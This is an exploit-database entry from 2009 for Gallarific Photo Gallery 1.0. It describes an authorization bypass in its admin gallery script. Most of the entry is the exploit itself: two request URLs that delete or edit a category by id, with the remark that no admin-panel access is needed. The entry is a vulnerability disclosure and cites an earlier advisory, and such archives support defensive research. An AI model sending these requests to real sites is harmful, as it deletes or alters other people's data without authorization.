exploit-db-mirror/exploits/php/webapps/9421.txt

# Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability

//Author: iLker Kandemir -- MEFISTO

//Price : 47 $

//script demo : http://www.gallarific.com/demo/index.php

//[imhatimi.org]

----------------------------------------------------------------
//exploit :

1) http://[site]/gadmin/gallery.php?task=delete&id=1

2) http://[site]/gadmin/gallery.php?task=edit&id=1

----------------------------------------------------------------
//Note:

/* You don't need access to admin-panel ;) */

side note:
Original Advisory without poC : http://secunia.com/advisories/29399

# milw0rm.com [2009-08-12]